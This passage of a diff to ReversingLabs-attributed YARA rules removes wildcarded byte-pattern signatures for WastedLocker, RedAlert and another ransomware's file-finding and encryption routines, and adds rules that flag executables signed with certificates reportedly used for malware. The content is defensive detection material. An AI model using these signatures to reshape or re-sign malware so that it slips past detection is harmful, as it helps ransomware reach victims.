-            ?? 8D 94 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94
-            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8B C8
-            8A 10 40 84 D2 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B
-            C8 C1 E9 ?? F3 A5 8B C8 83 E1 ?? 8D 84 24 ?? ?? ?? ?? F3 A4 8B C8 8A 10 40 84 D2 75
-            ?? BF ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B C8 C1 E9 ?? F3 A5 8B C8
-        }
-		$encrypt_files_p3 = {
-            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 E1 ?? 6A ?? 50 F3 A4 E8 ?? ?? ?? ?? 83 C4 ??
-            68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 43 83 C4 ?? 83 FB ?? 0F
-            8C ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 DB EB ?? 8D A4 24 ?? ?? ?? ?? EB ?? 8D 49 ??
-            0F B6 83 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C
-            24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 83 C4 ?? 8B C8 8A 10 40 84 D2 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C1 8B F1 4F 8A
-            4F ?? 47 84 C9 75 ?? 8B C8 C1 E9 ?? F3 A5 8B C8 83 E1 ?? 8D 84 24 ?? ?? ?? ?? F3 A4
-            8B C8 8A 10 40 84 D2 75 ?? BF ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B
-        }
-		$encrypt_files_p4 = {
-            C8 C1 E9 ?? F3 A5 8B C8 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 E1 ?? 6A ?? 50 F3 A4
-            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ??
-            43 83 C4 ?? 83 FB ?? 0F 8C ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BF ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ??
-            56 FF D3 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? 56 68 ?? ?? ?? ??
-            6A ?? 6A ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 44 8C ?? 41 89 4C 24 ?? 47 83 C6
-            ?? 83 FF ?? 7E ?? 8B 54 24 ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 8D 44
-            24 ?? 50 8D 4C 24 ?? 51 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? FF 15
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yijiajian (Amoy) Jiankan Tech Co.,LTD." and pe.signatures [ i ] . serial == "65:4b:40:6d:e3:88:ec:2a:ec:25:3f:f2:ba:4c:4b:bd" and 1398902400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_78D1817Ebcf338B4E9C810F9740A726B : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "3d0a97a4-c45a-5238-a287-867529b470cb"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13674-L13690"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "62e59130ef0ac35b17a265bb8bc2031cac6a75c11925ccb21eb4601b8fbe1a63"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CONSTRUTORA NOVO PARQUE LTDA - ME" and pe.signatures [ i ] . serial == "78:d1:81:7e:bc:f3:38:b4:e9:c8:10:f9:74:0a:72:6b" and 1431734400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Wastedlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_45Fbcdb1Fbd3D702Fb77257B45D8C58E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WastedLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "68090960-9878-5836-8caa-bf8f408a474e"
-		date = "2020-12-07"
-		modified = "2020-12-07"
+		id = "6bfd7c1d-2608-5ca0-8e1e-04c73588895a"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Wastedlocker.yara#L1-L86"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13692-L13708"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0899d3cc3bcea8eae60689a54f34e57bdc52088c879c8420b8e6d0b1969cb186"
+		logic_hash = "441e10f49515d75ee9e8983ba4321377fee13a91ca5eeddc08b393136ce8ccfd"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WastedLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 83 EC ?? 83 65 ?? ?? 57 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 53 8B 5D ?? 8D 04 41 89 45 ??
-            C7 00 ?? ?? ?? ?? 8B 43 ?? 57 51 89 45 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 89 45 ?? 0F 84
-            ?? ?? ?? ?? 56 8D 47 ?? 66 83 38 ?? 75 ?? 0F B7 4F ?? 66 85 C9 0F 84 ?? ?? ?? ?? 66
-            83 F9 ?? 75 ?? 66 83 7F ?? ?? 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F0
-            8D 14 0E B8 ?? ?? ?? ?? 3B D0 89 55 ?? 0F 83 ?? ?? ?? ?? F6 07 ?? 0F 85 ?? ?? ?? ??
-            8B 45 ?? 85 C0 74 ?? 83 7F ?? ?? 75 ?? 39 47 ?? 0F 82 ?? ?? ?? ?? 8D 44 36 ?? 50 8D
-            47 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 85 C9 74 ?? 8B 45 ?? 83 C0 ?? 50
-            E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 83 C0 ?? 50 E8
-            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 03 C6 8D 44 00 ?? 83 C0 ?? 50 6A ?? FF
-            35 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? 6A
-            ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 8D 44 00 ?? 50 FF 75 ?? 8D 46 ?? 50 89 76 ?? 89 36 E8
-            ?? ?? ?? ?? 8B 45 ?? 89 46 ?? 8B 45 ?? 89 46 ?? 8B 07 89 46 ?? 8B 47 ?? 89 46 ?? 8B
-        }
-		$find_files_p2 = {
-            47 ?? 89 46 ?? 8B 47 ?? 89 46 ?? 8B 47 ?? 83 C4 ?? 89 46 ?? 83 3B ?? 74 ?? 53 FF 15
-            ?? ?? ?? ?? 8D 43 ?? 8B 48 ?? 89 06 89 4E ?? 89 31 89 70 ?? FF 43 ?? 83 7B ?? ?? 74
-            ?? 8B 43 ?? 83 F8 ?? 75 ?? FF 73 ?? FF 15 ?? ?? ?? ?? 83 3B ?? 0F 84 ?? ?? ?? ?? 53
-            FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? EB ?? F6 45 ?? ?? 74 ?? 8D 4C 0E ?? 3B
-            C8 73 ?? 8D 04 36 50 8D 47 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 8D 04 41
-            66 83 60 ?? ?? 83 C4 ?? 83 7D ?? ?? 66 C7 00 ?? ?? 74 ?? 83 C1 ?? 51 8B 4D ?? E8 ??
-            ?? ?? ?? 85 C0 75 ?? 8B 4D ?? FF 75 ?? 8B 45 ?? 53 FF 75 ?? 8D 44 06 ?? FF 75 ?? 50
-            51 E8 ?? ?? ?? ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? F6 45 ?? ??
-            74 ?? 83 65 ?? ?? 83 7D ?? ?? 75 ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 43
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5E 57 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5B EB
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 5F C9 C2
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 75 ?? 8B 3D ?? ?? ?? ?? FF 75 ?? FF D7 85 C0
-            0F 84 ?? ?? ?? ?? FF 75 ?? 8D 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 45 ?? 75 ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? F6 C3 ?? 74 ?? 83 E0 ?? 50 FF 75 ?? FF 15 ??
-            ?? ?? ?? 85 C0 75 ?? 33 DB 85 DB 89 5D ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 75 ?? E8 ??
-            ?? ?? ?? 89 45 ?? EB ?? 83 65 ?? ?? 33 C9 39 4D ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 39 4D ?? 74 ?? 8B 45 ?? 8B 10 8B 40 ?? C1 65 ?? ?? 89 55 ?? 89 45
-            ?? EB ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 89 4D ?? 8B 45 ?? 89 45 ?? 89 4D ?? 89 4D ??
-            8B 5D ?? 33 F6 8B 45 ?? 85 C0 89 45 ?? 74 ?? 3B D8 73 ?? 89 5D ?? 2B 45 ?? 89 45 ??
-            75 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 7D ?? 8D 45 ?? 50 57 8D 47 ?? 50 FF 75
-            ?? 8B 45 ?? 03 C6 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 03 75 ?? 85 C0 89 45 ?? 0F
-        }
-		$encrypt_files_p2 = {
-            85 ?? ?? ?? ?? 2B 5D ?? 75 ?? EB ?? 8B 7D ?? 8B 45 ?? 0B 45 ?? 0F 84 ?? ?? ?? ?? 33
-            C0 3B 45 ?? 77 ?? 72 ?? 3B 5D ?? 73 ?? 8B C3 EB ?? 8B 45 ?? 29 45 ?? 8B 4D ?? 83 5D
-            ?? ?? 0B 4D ?? 75 ?? 8B 4D ?? 89 4D ?? 03 F0 2B D8 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B 4D
-            ?? 0F AC C8 ?? C1 E9 ?? 85 C0 74 ?? B9 ?? ?? ?? ?? F7 E1 29 45 ?? 19 55 ?? 01 45 ??
-            11 55 ?? 83 7D ?? ?? 75 ?? 8D 75 ?? E8 ?? ?? ?? ?? 85 C0 89 45 ?? 0F 84 ?? ?? ?? ??
-            8B 7D ?? 8D 47 ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 39 75 ?? 74 ?? 83 7D ??
-            ?? 74 ?? 8B 4D ?? 8B 45 ?? 8B D1 0B D0 74 ?? 0F AC C1 ?? C1 E8 ?? 83 4F ?? ?? 89 4F
-            ?? 89 75 ?? 39 75 ?? 74 ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 39
-            75 ?? 74 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 85 DB 0F 85
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 01 75 ?? 83 55 ?? ?? E9 ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF
-            D7 EB ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 5F 5E 5B C9 C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ding Ruan" and pe.signatures [ i ] . serial == "45:fb:cd:b1:fb:d3:d7:02:fb:77:25:7b:45:d8:c5:8e" and 1476662400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Ransomware_Redalert : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4B5D8Ed5Ca011679F141F124 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects RedAlert ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ec7567bf-2c39-529f-ae93-74270a161827"
-		date = "2022-09-01"
-		modified = "2022-09-01"
+		id = "c8bc0968-29d0-51a9-8cfe-7c8f447cef3d"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Linux.Ransomware.RedAlert.yara#L1-L146"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13710-L13726"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fe0d10c2ef1dacdb5374f319e470274b91f4f171db49de8c89e8aaa9aa75a45c"
+		logic_hash = "39ff0d5fd711524ce181596033d1d51579cd086eb20b87722aebf39623bbaa17"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "RedAlert"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            41 57 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 74 24 ?? BE ?? ?? ?? ?? 48
-            89 54 24 ?? 48 89 4C 24 ?? 4C 89 44 24 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 C5 75 ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 89 C3 75 ?? BF ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 48 8D 54 24 ??
-            89 C6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C0 75 ?? BF ?? ?? ?? ?? EB ?? 4C 8B B4 24 ??
-            ?? ?? ?? 4D 85 F6 7F ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? EB ?? 49
-            81 FE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 97 44 24 ?? 49 81 FE ?? ?? ?? ?? 0F 97
-            44 24 ?? 80 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 4C 89 F0 C7 44 24 ?? ?? ?? ?? ?? 48 89
-            D3 31 D2 48 F7 F3 48 6B C8 ?? 48 89 4C 24 ?? 49 81 FE ?? ?? ?? ?? 77 ?? 4D 89 F4 41
-            BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 41 BC ?? ?? ?? ?? 45 31 ED C7 44 24 ??
-            ?? ?? ?? ?? 4D 63 FD C7 44 24 ?? ?? ?? ?? ?? 4C 0F AF 7C 24 ?? E9 ?? ?? ?? ?? 80 7C
-            24 ?? ?? 74 ?? 45 85 ED 74 ?? 80 7C 24 ?? ?? 74 ?? 41 8D 45 ?? 3B 44 24 ?? 4C 89 FE
-            75 ?? 49 8D B6 ?? ?? ?? ?? EB ?? 31 F6 31 D2 48 89 EF E8 ?? ?? ?? ?? 48 63 7C 24 ??
-            48 89 E9 4C 89 E2 48 03 7C 24 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 39 E0 74 ?? BF ??
-            ?? ?? ?? EB ?? 44 01 64 24 ?? 41 FF C5 44 3B 6C 24 ?? 0F 85 ?? ?? ?? ?? 48 8D 9C 24
-            ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 84 C0 74 ?? BF ??
-            ?? ?? ?? EB ?? 48 8D BC 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 85 C0
-            74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 63 6C 24 ?? 45 89 E7 44 89 64 24 ?? 4C 0F AF
-            6C 24 ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B 4C 24 ?? 41 B8
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 84
-        }
-		$encrypt_files_p2 = {
-            C0 75 ?? 48 8B 54 24 ?? 48 8B 7C 24 ?? 48 89 E9 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7
-            15 ?? ?? ?? ?? 48 39 D0 75 ?? 48 8B 44 24 ?? 48 89 E9 BE ?? ?? ?? ?? 0F B7 50 ?? 48
-            8B 38 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F B7 51 ?? 48 39 D0 74 ?? BF ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 4C 03 7C 24 ?? 44 3B 6C 24 ?? 0F 8C ?? ?? ?? ?? E9
-            ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 80 7C
-            24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? 80 7C 24 ?? ?? 74 ?? 8B 44 24 ?? 4C 89 EE FF C0
-            3B 44 24 ?? 75 ?? 49 8D B6 ?? ?? ?? ?? EB ?? 31 F6 31 D2 48 89 EF E8 ?? ?? ?? ?? 48
-            63 44 24 ?? 48 8B 5C 24 ?? 48 8D B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 31 C9 31
-            D2 45 89 E1 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 01 C3 48 8D 84 24 ??
-            ?? ?? ?? 49 89 D8 48 89 1C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            48 89 E9 4C 89 E2 BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 39 E0 0F 85 ?? ?? ?? ??
-            FF 44 24 ?? 8B 54 24 ?? 8B 4C 24 ?? 01 54 24 ?? 39 4C 24 ?? 75 ?? 31 F6 BA ?? ?? ??
-            ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 E9 BA ?? ?? ?? ?? BE ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8A 5C 24 ?? 48 83 F8 ?? B0 ?? 0F 44 D8 44 3B 7C 24 ?? 88 5C 24
-            ?? 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 44 03 7C 24 ?? 4C 03 6C 24 ?? 8B 44 24 ?? 39
-            44 24 ?? 0F 8C ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 0F B6 44 24 ?? 48 81 C4 ?? ?? ??
-            ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
-        }
-		$find_files_p1 = {
-            41 57 FC 41 56 41 55 41 54 49 89 FC 55 53 48 83 EC ?? 48 8B 84 24 ?? ?? ?? ?? 48 89
-            4C 24 ?? 48 83 C9 ?? 48 89 74 24 ?? 4C 89 44 24 ?? 4C 89 4C 24 ?? 88 54 24 ?? 48 89
-            44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 44 8A BC 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24
-            ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 31 C0 F2 AE 4C 89
-            E7 48 F7 D1 4C 8D 71 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 85 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 48 83 C4 ?? 4C 89 E6 48 89 C2 5B 5D 41 5C 41 5D 41
-            5E 41 5F BF ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 45 84 FF 48 8D 6B ?? 74 ?? 0F B6 4B ??
-            48 89 EA 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 80 7B ?? ?? 0F 85 ?? ?? ?? ??
-            80 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84
-            ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BE ?? ??
-            ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FC 31 C0 48 83 C9 ?? 48 89 EF
-            F2 AE 4C 89 F0 48 29 C8 48 3B 44 24 ?? 76 ?? 48 8B 3D ?? ?? ?? ?? 48 89 E9 4C 89 E2
-            BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4B 8D 1C 34 48 89 EE 48 8D 7B ??
-            C6 03 ?? E8 ?? ?? ?? ?? 41 0F B6 C7 4C 8B 4C 24 ?? 4C 8B 44 24 ?? 89 44 24 ?? 48 8B
-            44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 74 24 ?? 4C 89 E7 48 89 44 24 ?? 48 8B
-        }
-		$find_files_p2 = {
-            44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 04 24 E8
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 45 84 FF 0F 85 ?? ?? ?? ?? FC 48 83 C9 ?? 48 89 EF 44 88
-            F8 F2 AE 48 8B 54 24 ?? 48 89 EF 48 89 CB 48 8B 4C 24 ?? 48 F7 D3 48 89 DE 4C 8D 6B
-            ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 48 89 EA 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 4C 89 EA BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 4B 8D 1C 34 48 89 EA 4C
-            89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8D 7B ?? 48 89 EE C6 03 ?? E8 ?? ?? ??
-            ?? 0F B7 0D ?? ?? ?? ?? 4C 89 E7 4C 8B 44 24 ?? 48 8B 54 24 ?? 48 8B 74 24 ?? FF 15
-            ?? ?? ?? ?? 84 C0 BF ?? ?? ?? ?? 74 ?? 48 8B 7C 24 ?? B9 ?? ?? ?? ?? 4C 89 E2 BE ??
-            ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8B 74 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 8D 56 ??
-            4C 89 E6 E8 ?? ?? ?? ?? C6 03 ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 C3 0F
-            85 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F E9
-        }
-		$setup_environment = {
-            55 48 89 E5 41 56 49 89 F6 BE ?? ?? ?? ?? 41 55 41 54 53 48 89 FB 48 83 EC ?? E8 ??
-            ?? ?? ?? 48 85 C0 49 89 C4 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7D ?? E8 ?? ??
-            ?? ?? 84 C0 BF ?? ?? ?? ?? 74 ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49
-            89 C4 74 ?? 0F B7 55 ?? 48 8B 7D ?? 48 89 C1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 55
-            ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 55 ?? 31 C9 39 C2 0F 85
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ??
-            ?? 49 89 E5 E8 ?? ?? ?? ?? 66 8B 3D ?? ?? 22 00 66 03 3D ?? ?? 22 00 66 8B 05 ?? ??
-            22 00 66 89 7D ?? 0F B7 FF 66 89 45 ?? E8 ?? ?? ?? ?? 0F B7 7D ?? 48 89 45 ?? E8 ??
-            ?? ?? ?? 0F B7 55 ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? 48 89 45 ?? E8 ?? ?? ?? ??
-            0F B7 55 ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 75 ?? BF ?? ??
-            ?? ?? 31 C0 E8 ?? ?? ?? ?? 0F B7 45 ?? 0F B7 35 ?? ?? ?? ?? 31 C9 48 8B 7D ?? 48 83
-            C0 ?? 25 ?? ?? ?? ?? 48 29 C4 48 8D 5C 24 ?? 48 83 E3 ?? 48 89 DA E8 ?? ?? ?? ?? 48
-            89 DE BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 0F B7 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 48 03
